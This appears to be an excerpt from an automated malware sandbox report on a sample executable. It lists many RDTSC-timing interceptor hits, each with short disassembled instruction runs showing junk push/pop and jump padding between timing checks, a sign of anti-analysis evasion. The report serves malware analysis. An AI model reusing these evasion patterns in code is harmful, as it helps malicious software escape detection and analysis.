Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 603925 second address: 60393F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F909CBB351Bh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60BF8D second address: 60BF98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F909C7BD306h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A99DD second address: 5A99E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A99E1 second address: 5A99ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A99ED second address: 5A99F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60B8D4 second address: 60B904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD317h 0x00000007 jmp 00007F909C7BD30Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60B904 second address: 60B908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60B908 second address: 60B922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD314h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 61051F second address: 610546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F909CBB351Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F909CBB3516h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 610546 second address: 61054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 612753 second address: 612781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007F909CBB351Ch 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ebx 0x0000001a jmp 00007F909CBB351Fh 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 612781 second address: 612785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6165C1 second address: 6165CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6165CA second address: 6165FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a jmp 00007F909C7BD314h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F909C7BD308h 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6165FC second address: 616603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 616603 second address: 61662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F909C7BD319h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 616EE0 second address: 616EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 616EE9 second address: 616F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F909C7BD30Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 616F02 second address: 616F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 616F06 second address: 616F10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F909C7BD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 61707B second address: 61708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F909CBB3516h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 61708A second address: 61709C instructions: 0x00000000 rdtsc 0x00000002 js 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F909C7BD312h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 61709C second address: 6170A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6171C5 second address: 6171D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jns 00007F909C7BD306h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6171D9 second address: 6171DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6174C7 second address: 6174CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 61CDCD second address: 61CDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 621DF1 second address: 621DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62249F second address: 6224A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6227F5 second address: 622812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F909C7BD313h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622812 second address: 622816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622936 second address: 62293F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622A99 second address: 622AA5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909CBB3516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622AA5 second address: 622AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Fh 0x00000009 jmp 00007F909C7BD310h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622C3D second address: 622C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F909CBB3522h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F909CBB352Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 622DC9 second address: 622DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5D4135 second address: 5D4139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628D6C second address: 628D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628D76 second address: 628D80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909CBB3516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628D80 second address: 628D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F909C7BD30Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 627C5D second address: 627C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F909CBB3516h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F909CBB3521h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628206 second address: 628216 instructions: 0x00000000 rdtsc 0x00000002 js 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628216 second address: 62821A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 627833 second address: 627837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 627837 second address: 627849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F909CBB351Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62864A second address: 628652 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 628A3B second address: 628A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62D544 second address: 62D552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F909C7BD306h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A15AB second address: 5A15AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A15AF second address: 5A15C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F909C7BD306h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A15C4 second address: 5A15C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A15C9 second address: 5A15DB instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Ch 0x00000008 jnc 00007F909C7BD306h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5A15DB second address: 5A15DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9841 second address: 5E9845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9BD8 second address: 5E9BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9F4E second address: 5E9FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F909C7BD306h 0x0000000a popad 0x0000000b je 00007F909C7BD30Ch 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F909C7BD319h 0x0000001a push 0000001Eh 0x0000001c add edi, 697F740Fh 0x00000022 add ecx, dword ptr [ebp+122D3568h] 0x00000028 nop 0x00000029 jmp 00007F909C7BD313h 0x0000002e push eax 0x0000002f pushad 0x00000030 jnp 00007F909C7BD308h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9FB2 second address: 5E9FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA0F1 second address: 5EA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA2F5 second address: 5EA2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA2F9 second address: 5EA362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007F909C7BD315h 0x00000010 nop 0x00000011 jl 00007F909C7BD30Ch 0x00000017 mov dword ptr [ebp+122D2E22h], edx 0x0000001d or dx, ABD6h 0x00000022 lea eax, dword ptr [ebp+12483E61h] 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F909C7BD308h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov cx, D942h 0x00000046 nop 0x00000047 js 00007F909C7BD30Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA362 second address: 5EA36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA36C second address: 5EA3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F909C7BD306h 0x0000000a popad 0x0000000b jmp 00007F909C7BD318h 0x00000010 popad 0x00000011 nop 0x00000012 mov ecx, dword ptr [ebp+122D3634h] 0x00000018 lea eax, dword ptr [ebp+12483E1Dh] 0x0000001e mov dword ptr [ebp+122D24E2h], ebx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 jmp 00007F909C7BD30Ah 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA3B2 second address: 5EA3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA3B9 second address: 5EA3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5EA3C5 second address: 5D4135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909CBB3516h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F909CBB3518h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2D77h], eax 0x00000033 call dword ptr [ebp+122D1E7Ah] 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d pop esi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62CB57 second address: 62CB73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F909C7BD306h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F909C7BD30Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62CE0F second address: 62CE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62CE14 second address: 62CE1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62CE1C second address: 62CE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62CE20 second address: 62CE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F909C7BD30Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e ja 00007F909C7BD319h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F909C7BD311h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62D0CC second address: 62D0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62D0D4 second address: 62D0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62D0D8 second address: 62D0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 62D0DC second address: 62D102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F909C7BD30Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 631B0B second address: 631B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 631B17 second address: 631B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Ch 0x00000007 jmp 00007F909C7BD30Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F909C7BD30Dh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 634A79 second address: 634AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007F909CBB3527h 0x0000000e js 00007F909CBB3516h 0x00000014 pop ebx 0x00000015 jmp 00007F909CBB3525h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6343B1 second address: 6343CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F909C7BD30Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 59FA9D second address: 59FAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 636B46 second address: 636B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 636B4C second address: 636B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 636B52 second address: 636B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 636CC2 second address: 636CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 636CC6 second address: 636CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 59DE97 second address: 59DE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63AEC5 second address: 63AED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F909C7BD306h 0x00000009 jl 00007F909C7BD306h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63AED6 second address: 63AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63AEDC second address: 63AEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63B034 second address: 63B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3528h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
